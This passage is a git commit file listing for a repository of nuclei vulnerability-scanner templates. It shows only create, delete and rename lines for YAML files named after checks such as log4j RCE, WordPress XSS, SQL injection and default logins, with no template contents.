delete mode 100644 nuclei-templates/Other/unauthenticated-netdata-10918.yaml create mode 100644 nuclei-templates/Other/unauthenticated-netdata.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-popup-upload-10921.yaml create mode 100644 
nuclei-templates/Other/unauthenticated-popup-upload.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-prtg-10926.yaml create mode 100644 nuclei-templates/Other/unauthenticated-prtg-10927.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-varnish-cache-purge-10931.yaml create mode 100644 nuclei-templates/Other/unauthenticated-varnish-cache-purge-10933.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-zipkin-10935.yaml create mode 100644 nuclei-templates/Other/unauthenticated-zipkin.yaml rename nuclei-templates/Other/{unauthorized-h3csecparh-login-10949.yaml => unauthorized-h3csecparh-login.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml delete mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml delete mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10955.yaml create mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10957.yaml delete mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml create mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10959.yaml rename nuclei-templates/Other/{unbounce-takeover-10970.yaml => unbounce-takeover-10971.yaml} (100%) create mode 100644 nuclei-templates/Other/unpatched-coldfusion-10977.yaml delete mode 100644 nuclei-templates/Other/unpatched-coldfusion.yaml create mode 100644 nuclei-templates/Other/upnp-device-10981.yaml delete mode 100644 nuclei-templates/Other/upnp-device.yaml create mode 100644 nuclei-templates/Other/ups-status-10985.yaml delete mode 100644 nuclei-templates/Other/ups-status.yaml delete mode 100644 nuclei-templates/Other/uptimerobot-takeover-10987.yaml create mode 100644 nuclei-templates/Other/uptimerobot-takeover.yaml create mode 100644 nuclei-templates/Other/urge-takeover-10990.yaml delete mode 100644 nuclei-templates/Other/urge-takeover.yaml rename nuclei-templates/Other/{vanguard-post-xss-10994.yaml => 
vanguard-post-xss-10992.yaml} (100%) rename nuclei-templates/Other/{vend-takeover-10997.yaml => vend-takeover-10996.yaml} (100%) delete mode 100644 nuclei-templates/Other/versa-default-login-11003.yaml create mode 100644 nuclei-templates/Other/versa-default-login.yaml delete mode 100644 nuclei-templates/Other/versa-sdwan-11005.yaml create mode 100644 nuclei-templates/Other/versa-sdwan.yaml create mode 100644 nuclei-templates/Other/vidyo-default-login-11009.yaml delete mode 100644 nuclei-templates/Other/vidyo-default-login-11010.yaml rename nuclei-templates/Other/{viewlinc-crlf-injection-11012.yaml => viewlinc-crlf-injection.yaml} (100%) rename nuclei-templates/Other/{viewpoint-system-status-11019.yaml => viewpoint-system-status-11018.yaml} (100%) rename nuclei-templates/Other/{vigor-login.yaml => vigor-login-11023.yaml} (100%) rename nuclei-templates/Other/{virtual-ema-detect-11024.yaml => virtual-ema-detect-11025.yaml} (100%) create mode 100644 nuclei-templates/Other/visualstudio.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-11040.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-11041.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11033.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-panel-11035.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-panel.yaml delete mode 100644 nuclei-templates/Other/vmware-log4j.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-11048.yaml rename nuclei-templates/Other/{vmware-vcenter-lfi-linux-11042.yaml => vmware-vcenter-lfi-linux.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-vcenter-lfi.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-ssrf-11051.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-ssrf.yaml create mode 100644 
nuclei-templates/Other/vmware-vsphere-web-client.yaml rename nuclei-templates/Other/{voipmonitor-workflow-11064.yaml => voipmonitor-workflow-11065.yaml} (100%) delete mode 100644 nuclei-templates/Other/voiprce(1).yaml create mode 100644 nuclei-templates/Other/vpms-auth-bypass-11066.yaml delete mode 100644 nuclei-templates/Other/vpms-auth-bypass.yaml create mode 100644 nuclei-templates/Other/vsftpd-detection-11074.yaml delete mode 100644 nuclei-templates/Other/vsftpd-detection.yaml rename nuclei-templates/Other/{w3c-total-cache-ssrf-11081.yaml => w3c-total-cache-ssrf-11077.yaml} (100%) rename nuclei-templates/Other/{wadl-api-11085.yaml => wadl-api-11082.yaml} (100%) create mode 100644 nuclei-templates/Other/wago-plc-panel-11093.yaml delete mode 100644 nuclei-templates/Other/wago-plc-panel.yaml create mode 100644 nuclei-templates/Other/wallix-accessmanager-panel-11095.yaml delete mode 100644 nuclei-templates/Other/wallix-accessmanager-panel.yaml delete mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11104.yaml create mode 100644 nuclei-templates/Other/wamp-xdebug-detect.yaml rename nuclei-templates/Other/{wangkang-ns-asg-rce-2.yaml => wangkang-NS-ASG-rce-2.yaml} (100%) rename nuclei-templates/Other/{wangkang-NGFW-rce.yaml => wangkang-ngfw-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/watchguard-credentials-disclosure-11107.yaml create mode 100644 nuclei-templates/Other/watchguard-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/watchguard-panel-11108.yaml delete mode 100644 nuclei-templates/Other/watchguard-panel.yaml create mode 100644 nuclei-templates/Other/wazuh-detect-11111.yaml delete mode 100644 nuclei-templates/Other/wazuh-detect-11112.yaml create mode 100644 nuclei-templates/Other/wazuh-panel-11113.yaml delete mode 100644 nuclei-templates/Other/wazuh-panel.yaml create mode 100644 nuclei-templates/Other/web-config-11126.yaml delete mode 100644 nuclei-templates/Other/web-config-11127.yaml create mode 100644 
nuclei-templates/Other/web-ftp-detect-11138.yaml delete mode 100644 nuclei-templates/Other/web-ftp-detect.yaml create mode 100644 nuclei-templates/Other/web-suite-detect-11168.yaml delete mode 100644 nuclei-templates/Other/web-suite-detect.yaml delete mode 100644 nuclei-templates/Other/webcamxp-5-11122.yaml create mode 100644 nuclei-templates/Other/webcamxp-5.yaml rename nuclei-templates/Other/{webeditors-11128.yaml => webeditors-11130.yaml} (100%) create mode 100644 nuclei-templates/Other/webflow-takeover-11133.yaml delete mode 100644 nuclei-templates/Other/webflow-takeover-11134.yaml rename nuclei-templates/Other/{weblogic-detect-11142.yaml => weblogic-detect-11144.yaml} (100%) create mode 100644 nuclei-templates/Other/weblogic-iiop-detect-11147.yaml delete mode 100644 nuclei-templates/Other/weblogic-iiop-detect-11148.yaml delete mode 100644 nuclei-templates/Other/weblogic-login-11149.yaml create mode 100644 nuclei-templates/Other/weblogic-login.yaml delete mode 100644 nuclei-templates/Other/weblogic-t3-detect-11151.yaml create mode 100644 nuclei-templates/Other/weblogic-t3-detect.yaml rename nuclei-templates/Other/{webmin-panel-11158.yaml => webmin-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/webmodule-ee-11162.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-11164.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-panel-11161.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-panel.yaml rename nuclei-templates/Other/{Webtalk-leakage.yaml => webtalk-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/webtools-home-11169.yaml delete mode 100644 nuclei-templates/Other/webtools-home.yaml delete mode 100644 nuclei-templates/Other/webui-rce-11170.yaml create mode 100644 nuclei-templates/Other/webui-rce-11172.yaml delete mode 100644 nuclei-templates/Other/webview-addjavascript-interface-11175.yaml create mode 100644 nuclei-templates/Other/webview-addjavascript-interface-11177.yaml rename 
nuclei-templates/Other/{webview-load-url-11181.yaml => webview-load-url-11182.yaml} (100%) delete mode 100644 nuclei-templates/Other/webview-universal-access-11185.yaml create mode 100644 nuclei-templates/Other/webview-universal-access.yaml create mode 100644 nuclei-templates/Other/weekender-newspaper-open-redirect-11188.yaml delete mode 100644 nuclei-templates/Other/weekender-newspaper-open-redirect.yaml create mode 100644 nuclei-templates/Other/weiphp-sql-injection-11189.yaml delete mode 100644 nuclei-templates/Other/weiphp-sql-injection.yaml create mode 100644 nuclei-templates/Other/wems-manager-xss-11192.yaml delete mode 100644 nuclei-templates/Other/wems-manager-xss-11194.yaml create mode 100644 nuclei-templates/Other/wildfly-panel-11209.yaml delete mode 100644 nuclei-templates/Other/wildfly-panel.yaml rename nuclei-templates/Other/{window-name-domxss-11213.yaml => window-name-domxss.yaml} (100%) create mode 100644 nuclei-templates/Other/wix-takeover-11219.yaml delete mode 100644 nuclei-templates/Other/wix-takeover.yaml rename nuclei-templates/Other/{wondercms-detect-11223.yaml => wondercms-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/wooyun-2015-148227-11225.yaml create mode 100644 nuclei-templates/Other/wooyun-path-traversal-11229.yaml delete mode 100644 nuclei-templates/Other/wooyun-path-traversal.yaml create mode 100644 nuclei-templates/Other/wordpress-LFI.yaml delete mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11234.yaml create mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 nuclei-templates/Other/wordpress-bbpress-plugin-listing-11245.yaml create mode 100644 nuclei-templates/Other/wordpress-bbpress-plugin-listing.yaml delete mode 100644 nuclei-templates/Other/wordpress-debug-log-11259.yaml create mode 100755 nuclei-templates/Other/wordpress-debug-log.yaml delete mode 100644 nuclei-templates/Other/wordpress-detect-11261.yaml create mode 100644 
nuclei-templates/Other/wordpress-detect.yaml delete mode 100644 nuclei-templates/Other/wordpress-directory-listing-11265.yaml create mode 100644 nuclei-templates/Other/wordpress-directory-listing-11266.yaml delete mode 100644 nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-1.yaml delete mode 100644 nuclei-templates/Other/wordpress-emergency-script-11277.yaml create mode 100644 nuclei-templates/Other/wordpress-emergency-script.yaml delete mode 100644 nuclei-templates/Other/wordpress-gtranslate-plugin-listing-11282.yaml create mode 100644 nuclei-templates/Other/wordpress-gtranslate-plugin-listing-11284.yaml delete mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml create mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11288.yaml delete mode 100644 nuclei-templates/Other/wordpress-installer-log-11290.yaml create mode 100644 nuclei-templates/Other/wordpress-installer-log.yaml delete mode 100644 nuclei-templates/Other/wordpress-lfi.yaml create mode 100644 nuclei-templates/Other/wordpress-plugins-detect.yaml delete mode 100644 nuclei-templates/Other/wordpress-plugins2.yaml delete mode 100644 nuclei-templates/Other/wordpress-rce-simplefilelist-11302.yaml create mode 100644 nuclei-templates/Other/wordpress-rce-simplefilelist-11304.yaml create mode 100644 nuclei-templates/Other/wordpress-rdf-user-enum.yaml delete mode 100644 nuclei-templates/Other/wordpress-redirection-plugin-listing-11306.yaml create mode 100644 nuclei-templates/Other/wordpress-redirection-plugin-listing-11308.yaml delete mode 100644 nuclei-templates/Other/wordpress-takeover-11312.yaml create mode 100644 nuclei-templates/Other/wordpress-takeover-11313.yaml rename nuclei-templates/Other/{wordpress-themes2.yaml => wordpress-themes-detect-11316.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-user-enum-11330.yaml delete mode 100644 nuclei-templates/Other/wordpress-user-enum.yaml delete mode 100644 
nuclei-templates/Other/wordpress-user-enumeration-11329.yaml create mode 100644 nuclei-templates/Other/wordpress-user-enumeration.yaml create mode 100644 nuclei-templates/Other/wordpress-weak-credentials-11334.yaml delete mode 100644 nuclei-templates/Other/wordpress-weak-credentials.yaml create mode 100644 nuclei-templates/Other/wordpress-woocommerce-listing-11339.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-listing-11341.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli-11345.yaml create mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11353.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11357.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11362.yaml delete mode 100644 nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11371.yaml create mode 100644 nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml rename nuclei-templates/Other/{wordpress-xmlrpc-listmethods.yaml => wordpress-xmlrpc-listmethods-11372.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11375.yaml delete mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11377.yaml delete mode 100644 nuclei-templates/Other/workresources-rdp-11382.yaml create mode 100644 nuclei-templates/Other/workresources-rdp.yaml rename nuclei-templates/Other/{worksites-detection-11384.yaml => worksites-detection-11383.yaml} (100%) create mode 100644 nuclei-templates/Other/wowza-streaming-engine-11395.yaml delete mode 100644 nuclei-templates/Other/wowza-streaming-engine-11398.yaml rename nuclei-templates/Other/{wp-altair-listing-11405.yaml => wp-altair-listing-11406.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-app-log-11413.yaml delete mode 100644 nuclei-templates/Other/wp-app-log.yaml 
rename nuclei-templates/Other/{wp-arforms-listing.yaml => wp-arforms-listing-11415.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-church-admin-xss-11419.yaml delete mode 100644 nuclei-templates/Other/wp-church-admin-xss-11420.yaml delete mode 100644 nuclei-templates/Other/wp-code-snippets-xss-11425.yaml create mode 100644 nuclei-templates/Other/wp-code-snippets-xss-11426.yaml create mode 100644 nuclei-templates/Other/wp-config-setup-11427.yaml delete mode 100644 nuclei-templates/Other/wp-config-setup.yaml create mode 100644 nuclei-templates/Other/wp-custom-tables-xss-11433.yaml delete mode 100644 nuclei-templates/Other/wp-custom-tables-xss-11434.yaml delete mode 100644 nuclei-templates/Other/wp-detect (copy 1).yaml create mode 100644 nuclei-templates/Other/wp-detect.yaml rename nuclei-templates/Other/{wp-email-subscribers-listing-11440.yaml => wp-email-subscribers-listing-11443.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-engine-config.yaml create mode 100644 nuclei-templates/Other/wp-flagem-xss-11453.yaml delete mode 100644 nuclei-templates/Other/wp-flagem-xss.yaml rename nuclei-templates/Other/{wp-full-path-disclosure-11457.yaml => wp-full-path-disclosure.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-haberadam-idor-11467.yaml create mode 100644 nuclei-templates/Other/wp-haberadam-idor-11468.yaml rename nuclei-templates/Other/{wp-install-11475.yaml => wp-install.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-javospot-lfi-11480.yaml create mode 100644 nuclei-templates/Other/wp-javospot-lfi-11482.yaml create mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11492.yaml delete mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml delete mode 100644 nuclei-templates/Other/wp-misconfig.yaml delete mode 100644 nuclei-templates/Other/wp-mstore-plugin-listing-11501.yaml create mode 100644 nuclei-templates/Other/wp-mstore-plugin-listing.yaml delete mode 100644 
nuclei-templates/Other/wp-nextgen-xss-11516.yaml create mode 100644 nuclei-templates/Other/wp-nextgen-xss-11518.yaml create mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11522.yaml delete mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml delete mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11527.yaml create mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11528.yaml create mode 100644 nuclei-templates/Other/wp-plugin-lifterlms-11533.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-lifterlms.yaml create mode 100644 nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11537.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11538.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-utlimate-member-11539.yaml create mode 100644 nuclei-templates/Other/wp-plugin-utlimate-member-11541.yaml rename nuclei-templates/Other/{wp-prostore-open-redirect-11548.yaml => wp-prostore-open-redirect-11549.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-qards-listing-11551.yaml delete mode 100644 nuclei-templates/Other/wp-qards-listing-11552.yaml create mode 100644 nuclei-templates/Other/wp-securimage-xss-11556.yaml delete mode 100644 nuclei-templates/Other/wp-securimage-xss.yaml create mode 100644 nuclei-templates/Other/wp-security-open-redirect-11561.yaml delete mode 100644 nuclei-templates/Other/wp-security-open-redirect.yaml create mode 100644 nuclei-templates/Other/wp-slideshow-xss-11575.yaml delete mode 100644 nuclei-templates/Other/wp-slideshow-xss-11576.yaml delete mode 100644 nuclei-templates/Other/wp-socialfit-xss-11580.yaml create mode 100644 nuclei-templates/Other/wp-socialfit-xss-11581.yaml rename nuclei-templates/Other/{wp-super-forms-11587.yaml => wp-super-forms-11585.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-tinymce-lfi-11589.yaml delete mode 100644 nuclei-templates/Other/wp-tinymce-lfi-11591.yaml delete mode 100644 nuclei-templates/Other/wp-tutor-lfi-11598.yaml create 
mode 100644 nuclei-templates/Other/wp-tutor-lfi.yaml create mode 100755 nuclei-templates/Other/wp-upload-data-11602.yaml delete mode 100644 nuclei-templates/Other/wp-upload-data-11605.yaml create mode 100644 nuclei-templates/Other/wp-userenum.yaml delete mode 100644 nuclei-templates/Other/wp-vault-lfi-11611.yaml delete mode 100644 nuclei-templates/Other/wp-whmcs-xss-11614.yaml create mode 100644 nuclei-templates/Other/wp-whmcs-xss.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-1.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11616.yaml delete mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11619.yaml rename nuclei-templates/Other/{wp-xmlrpc-brute-force-11624.yaml => wp-xmlrpc-brute-force.yaml} (100%) create mode 100644 nuclei-templates/Other/wpdm-cache-session-11438.yaml delete mode 100644 nuclei-templates/Other/wpdm-cache-session-11439.yaml create mode 100644 nuclei-templates/Other/wpengine-config-check.yaml create mode 100644 nuclei-templates/Other/wpmudev-my-calender-xss-11502.yaml delete mode 100644 nuclei-templates/Other/wpmudev-my-calender-xss-11503.yaml delete mode 100644 nuclei-templates/Other/wpmudev-pub-keys-11507.yaml create mode 100644 nuclei-templates/Other/wpmudev-pub-keys.yaml rename nuclei-templates/Other/{wptouch-open-redirect-11592.yaml => wptouch-open-redirect-11594.yaml} (100%) delete mode 100644 nuclei-templates/Other/wptouch-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/wsdl-api-11632.yaml delete mode 100644 nuclei-templates/Other/wsdl-api.yaml delete mode 100644 nuclei-templates/Other/wso2-2019-0598-11635.yaml create mode 100644 nuclei-templates/Other/wso2-2019-0598-11636.yaml rename nuclei-templates/Other/{wso2-apimanager-detect-11639.yaml => wso2-apimanager-detect-11638.yaml} (100%) create mode 100644 nuclei-templates/Other/wso2-default-login-11641.yaml delete mode 100644 nuclei-templates/Other/wso2-default-login-11643.yaml create 
mode 100644 nuclei-templates/Other/wso2-management-console-11644.yaml delete mode 100644 nuclei-templates/Other/wso2-management-console.yaml create mode 100644 nuclei-templates/Other/wufoo-takeover-11649.yaml delete mode 100644 nuclei-templates/Other/wufoo-takeover-11651.yaml rename nuclei-templates/Other/{wuzhicms-detect-11654.yaml => wuzhicms-detect-11655.yaml} (100%) create mode 100644 nuclei-templates/Other/wuzhicms-sqli-11658.yaml delete mode 100644 nuclei-templates/Other/wuzhicms-sqli.yaml create mode 100644 nuclei-templates/Other/xdcms-sqli-11667.yaml delete mode 100644 nuclei-templates/Other/xdcms-sqli.yaml rename nuclei-templates/Other/{xenforo-login-11673.yaml => xenforo-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/xenmobile-login-11675.yaml create mode 100644 nuclei-templates/Other/xenmobile-login.yaml create mode 100644 nuclei-templates/Other/xerox-efi-lfi-11681.yaml delete mode 100644 nuclei-templates/Other/xerox-efi-lfi.yaml create mode 100644 nuclei-templates/Other/xerox7-default-login-11680.yaml delete mode 100644 nuclei-templates/Other/xerox7-default-login.yaml create mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf-11687.yaml delete mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf.yaml rename nuclei-templates/Other/{fuzzing-xss-get-params-html-injection.yaml => xss-fuzz-html-tag-injection.yaml} (100%) create mode 100644 nuclei-templates/Other/xss-fuzz.yaml delete mode 100644 nuclei-templates/Other/xvr-login-11702.yaml create mode 100644 nuclei-templates/Other/xvr-login-11705.yaml create mode 100644 nuclei-templates/Other/xxljob-default-login-11712.yaml delete mode 100644 nuclei-templates/Other/xxljob-default-login-11714.yaml rename nuclei-templates/Other/{yapi-detect-11720.yaml => yapi-detect-11719.yaml} (100%) rename nuclei-templates/Other/{yapi-rce-11724.yaml => yapi-rce-11725.yaml} (100%) delete mode 100644 nuclei-templates/Other/yarn-lock-11728.yaml create mode 100644 nuclei-templates/Other/yarn-lock-11729.yaml 
create mode 100644 nuclei-templates/Other/yarn-manager-exposure-11731.yaml delete mode 100644 nuclei-templates/Other/yarn-manager-exposure-11733.yaml create mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11734.yaml delete mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml delete mode 100644 nuclei-templates/Other/yii-debugger-11739.yaml create mode 100644 nuclei-templates/Other/yii-debugger-11740.yaml rename nuclei-templates/Other/{yongyou-eltextfile.yaml => yongyou-ELTextFile.yaml} (100%) delete mode 100644 nuclei-templates/Other/yongyou-icurrtype-sqli.yaml create mode 100644 nuclei-templates/Other/yongyou-jdbcRead.yaml create mode 100644 nuclei-templates/Other/yongyou-ssrf-11745.yaml delete mode 100644 nuclei-templates/Other/yongyou-ssrf.yaml rename nuclei-templates/Other/{yongyou-u8-RegisterServlet-sql-Injection.yaml => yonyou-u8-registerservlet-sqli.yaml} (100%) rename nuclei-templates/Other/{yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml => yonyou_nc_cloud_ncchr_attachment_uploadchunk_upload.yaml} (100%) delete mode 100644 nuclei-templates/Other/yopass-panel-11749.yaml create mode 100644 nuclei-templates/Other/yopass-panel.yaml rename nuclei-templates/Other/{yunxintong-fileread.yaml => yunxintong-fileRead.yaml} (100%) delete mode 100644 nuclei-templates/Other/zabbix-default-credentials-11758.yaml create mode 100644 nuclei-templates/Other/zabbix-default-credentials.yaml delete mode 100644 nuclei-templates/Other/zabbix-error-11764.yaml create mode 100644 nuclei-templates/Other/zabbix-error-11766.yaml delete mode 100644 nuclei-templates/Other/zabbix-server-login-11767.yaml create mode 100644 nuclei-templates/Other/zabbix-server-login.yaml delete mode 100644 nuclei-templates/Other/zcms-v3-sqli-11773.yaml create mode 100644 nuclei-templates/Other/zcms-v3-sqli.yaml create mode 100644 nuclei-templates/Other/zend-config-file-11778.yaml delete mode 100644 nuclei-templates/Other/zend-config-file.yaml create mode 100644 
nuclei-templates/Other/zendesk-takeover-11781.yaml delete mode 100644 nuclei-templates/Other/zendesk-takeover-11783.yaml delete mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info.yaml create mode 100644 nuclei-templates/Other/zenphoto-sensitive-info.yaml rename nuclei-templates/Other/{zentao-detect-11785.yaml => zentao-detect-11787.yaml} (100%) delete mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11791.yaml create mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11794.yaml rename nuclei-templates/Other/{zhiyuan-oa-unauthorized-11806.yaml => zhiyuan-oa-unauthorized-11808.yaml} (100%) rename nuclei-templates/Other/{zimbra-preauth-ssrf-11810.yaml => zimbra-preauth-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/zimbra-web-client-11814.yaml create mode 100644 nuclei-templates/Other/zimbra-web-client.yaml create mode 100644 nuclei-templates/Other/zip-backup-files-11815.yaml delete mode 100644 nuclei-templates/Other/zip-backup-files-11818.yaml create mode 100644 nuclei-templates/Other/zm-system-log-detect-11833.yaml delete mode 100644 nuclei-templates/Other/zm-system-log-detect-11834.yaml rename nuclei-templates/Other/{zuul-panel-11842.yaml => zuul-panel.yaml} (100%) create mode 100644 "nuclei-templates/Other/\344\270\234\346\226\271\351\200\232tongweb\345\272\224\347\224\250\346\234\215\345\212\241\345\231\250.yaml" create mode 100644 "nuclei-templates/Other/\344\272\221\346\227\266\347\251\272\347\244\276\344\274\232\345\214\226\345\225\206\344\270\232erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\344\274\201\346\234\233\345\210\266\351\200\240erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\244\247\345\215\216\346\231\272\350\203\275\347\211\251\350\201\224icc\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260.yaml" create mode 100644 
"nuclei-templates/Other/\345\244\251\351\227\256\347\211\251\344\270\232erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\245\245\345\250\201\344\272\232\350\247\206\345\261\217\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\345\256\207\350\247\206vs-isc5000-e.yaml" create mode 100644 "nuclei-templates/Other/\345\270\206\350\275\257\346\212\245\350\241\250.yaml" create mode 100644 "nuclei-templates/Other/\345\270\206\350\275\257\346\225\260\346\215\256\345\206\263\347\255\226\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\271\277\350\201\224\350\276\276oa.yaml" create mode 100644 "nuclei-templates/Other/\345\276\256\345\256\217oa.yaml" create mode 100644 "nuclei-templates/Other/\346\205\247\347\202\271oa.yaml" create mode 100644 "nuclei-templates/Other/\346\213\223\345\260\224\346\200\235sso.yaml" create mode 100644 "nuclei-templates/Other/\346\213\223\345\260\224\346\200\235was.yaml" create mode 100644 "nuclei-templates/Other/\346\214\207\346\216\214\346\230\223.yaml" create mode 100644 "nuclei-templates/Other/\346\261\211\345\276\227srm\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\346\263\233\345\276\256-oa e-cology8.yaml" create mode 100644 "nuclei-templates/Other/\346\263\233\346\231\256\345\273\272\347\255\221\345\267\245\347\250\213\346\226\275\345\267\245oa.yaml" create mode 100644 "nuclei-templates/Other/\346\265\267\347\277\224\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\347\221\236\345\217\213\345\272\224\347\224\250\350\231\232\346\213\237\345\214\226\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\347\224\250\345\217\213-fe\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260.yaml" create mode 100644 
"nuclei-templates/Other/\347\224\250\345\217\213\350\207\264\350\277\234a6\345\215\217\345\220\214\345\212\236\345\205\254\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6-m\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6-s\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6s\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8-m\344\274\201\344\270\232\351\233\206\345\233\242\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8-v5\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8n.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234g6-n\345\244\232\347\273\204\347\273\207\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234g6-sc\345\244\232\347\273\204\347\273\207\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234\345\215\217\345\210\233a6\345\215\217\345\220\214\345\212\236\345\205\254\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\351\207\221\350\235\266apusic\345\272\224\347\224\250\346\234\215\345\212\241\345\231\250.yaml" create mode 100644 "nuclei-templates/Other/\351\223\255\351\243\236mcms.yaml" diff --git a/README.md b/README.md index f6dbba4121..376f0547c0 100644 --- a/README.md +++ b/README.md 
